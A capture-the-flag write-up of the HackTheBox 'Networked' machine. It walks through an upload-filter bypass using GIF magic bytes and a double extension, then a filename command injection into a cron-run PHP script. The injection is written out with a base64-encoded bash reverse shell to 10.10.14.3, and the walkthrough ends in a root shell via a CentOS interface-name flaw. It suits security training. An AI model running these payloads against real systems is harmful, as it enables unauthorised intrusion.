---
title: "Writeup - Networked (HTB)"
date: 2022-05-27
slug: "writeup-networked-htb"
type: "writeup-ctf"
--- 

This is a writeup for the [Networked](https://app.hackthebox.com/machines/Networked) machine from the HackTheBox site.

## Enumeration

First, let's start with a scan of our target with the following command:


```bash
nmap -sV -T4 -Pn 10.10.11.146
```
Two TCP ports are discovered:

![](img/image-1.webp)

- 22/tcp : SSH port (OpenSSH 7.4)
- 80/tcp : HTTP web server (Apache 2.4.6)

![](img/image-2.webp)

## Exploit

First, I start by scanning the pages of the website.

![](img/image-3.webp)

I find several pages interesting and especially `backup` in which you can find an archive.

![](img/image-4.webp)

I download the archive, unzip it and find the following files inside:

![](img/image-5.webp)

The different files correspond to pages of the site:

![](img/image-6.webp)

![](img/image-7.webp)

So we have the possibility to upload images on the `upload.php` page and then to view them on the `photos.php` page.

By analyzing the source code of the `upload.php` page I find that there are checks on the upload files.


```php
[...]
list ($foo,$ext) = getnameUpload($myFile["name"]);
    $validext = array('.jpg', '.png', '.gif', '.jpeg');
    $valid = false;
    foreach ($validext as $vext) {
      if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) {
        $valid = true;
      }
    }
[...]
```
So I'm not just going to be able to send a PHP reverse shell with the `.png` extension because the site checks the file signature to verify its type. The signature of a file is a set of magic byte at the beginning of a file. By looking in the following list I find the signature of the GIF files: [files signatures](https://en.wikipedia.org/wiki/List_of_file_signatures).

Before adding the signature, my file is simply a Unicode text:

![](img/image-8.webp)

After adding the GIF signature, we can see that the file is now identified as a GIF image data.

![](img/image-9.webp)

In addition to this signature I will have to change the extensions so that the file passes the security, but also that it is executed as PHP by the server:


```bash
mv reverse.jpg reverse.php.gif
```
I can now upload it and go view it to execute the code and run the reverse shell.

![](img/image-10.webp)

I now have a reverse shell as `apache`. But I don't have the access to see the first flag. In the user's home folder, I notice 2 interesting files:

![](img/image-11.webp)

The first one is a CRON file that executes the `check_attack.php` script every 3 minutes.


```bash
*/3 * * * * php /home/guly/check_attack.php
```
The second one is the script that allows you to delete suspicious files from the `/var/www/html/uploads` :


```php
<?php
require '/var/www/html/lib.php';
$path = '/var/www/html/uploads/';
$logpath = '/tmp/attack.log';
$to = 'guly';
$msg= '';
$headers = "X-Mailer: check_attack.php\r\n";

$files = array();
$files = preg_grep('/^([^.])/', scandir($path));

foreach ($files as $key => $value) {
        $msg='';
  if ($value == 'index.html') {
        continue;
  }
  #echo "-------------\n";

  #print "check: $value\n";
  list ($name,$ext) = getnameCheck($value);
  $check = check_ip($name,$value);

  if (!($check[0])) {
    echo "attack!\n";
    # todo: attach file
    file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);

    exec("rm -f $logpath");
    exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
    echo "rm -f $path$value\n";
    mail($to, $msg, $msg, $headers, "-F$value");
  }
}

?>
```
Interestingly, the script executes an `rm` command with a variable directly. All this without verification! So I will be able to create a file with a name composed of a command.

The file name will be composed of a name, then a `;` to indicate the end of the command, then a reverse shell in base64 because we are not allowed to put `/` in the file name.

To create the file I use the following command:


```bash
touch /var/www/html/uploads/test';echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4zLzEyMzUgMD4mMQo= | base64 -d | bash'
```
I wait a few seconds and now I have a reverse shell and I can get the first flag.

![](img/image-12.webp)

## Privilege escalation

First I check the sudo permissions of my user :

![](img/image-13.webp)

I have the right to run the `changename.sh` script as root. Looking at the code of the script, I determine that it allows to change the name of a network interface.


```bash
#!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
EoF

regexp="^[a-zA-Z0-9_\ /-]+$"

for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
        echo "interface $var:"
        read x
        while [[ ! $x =~ $regexp ]]; do
                echo "wrong input, try again"
                echo "interface $var:"
                read x
        done
        echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
done
```
After some research on the Linux distributions used by the machine I find the following flaw: [CentOS Network Interface Exploit](https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f).

On CentOS there is an exploit that allows to execute commands as `root` via the name of a network interface.

I execute the script and enter the following name for the interface:

![](img/image-14.webp)

I now have a reverse shell `root` and I can get the last flag.

## Recommendations

To patch this host I think it would be necessary to perform a number of actions:

- Do not leave the source code of the website accessible by all
- Set up an additional protection on the upload to avoid sending code
- Do not use variables in commands without Sanitizing